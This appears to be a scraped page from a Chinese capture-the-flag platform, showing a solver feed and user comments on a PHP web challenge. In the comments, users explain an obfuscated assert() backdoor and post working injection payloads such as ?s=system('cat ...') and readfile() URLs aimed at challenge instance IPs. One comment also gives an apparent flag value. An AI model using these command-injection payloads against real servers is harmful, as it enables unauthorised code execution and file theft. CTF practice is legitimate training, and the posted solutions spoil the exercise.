评分(11)
解题动态
1234165 攻破了该题 18小时前
gm26ctf 攻破了该题 19小时前
沈玉鑫 攻破了该题 20小时前
mwhatevery 攻破了该题 21小时前
kimol 攻破了该题 1天前
zuiqhf 攻破了该题 1天前
kiwo 攻破了该题 1天前
nonlvyx 攻破了该题 1天前
goldfish 攻破了该题 2天前
苦味的辣条 攻破了该题 2天前
花猫咪 攻破了该题 2天前
001 攻破了该题 2天前
AWDAI 攻破了该题 3天前
wauo3 攻破了该题 3天前
小竹 攻破了该题 3天前
Star666 攻破了该题 3天前
2278788320 攻破了该题 3天前
sbhacker1 攻破了该题 4天前
bilabu 攻破了该题 4天前
评论
聪仔草莓51 19天前
举报
源码将字符串 a#s#s#e#r#t 按分隔符拆分后重新拼接成函数名 assert,并调用 assert(传入参数)。该函数在旧版本 PHP 中会把传入字符串当作代码执行,因此构造参数即可执行任意 PHP 代码。 利用方式:传入列目录的参数找到 flag 文件名,再传入读取文件的参数获取内容,即可得到本题答案。
西红柿dun牛腩 1月前
举报
这道题目,需要一点基础知识,还需要一些脑洞,初学者不容易想到。很好的学习素材
yiqie 1月前
举报
flag{**********}
icyskin 1月前
举报
http://160.202.254.160:19320/?s=system(%27cat%20flaga15808abee46a1d5.txt%27)
ggsea 1月前
举报
列出当前目录:?s=print_r(scandir('./')),看到flag.txt
lawrencekz 2月前
举报
flag{******}
hwx 3月前
举报
直接先?s=system('ls'),就看到啦flg的文档再?s=system('cat flg的文档'),就看到flg
b2026tf 3月前
举报
本质:字符分割拼接隐藏 assert,绕过防护 等价后门:assert($_GET['s']) 直接 ?s=要执行的PHP代码 即可利用。?s=system('cat flag.php');
syhaisy 3月前
举报
20702af5309ab1f70e0f7e8a81076a4e
hualong 3月前
举报
直接去搜索 http://171.80.2.169:12682/?s=readfile(%22flaga15808abee46a1d5.txt%22);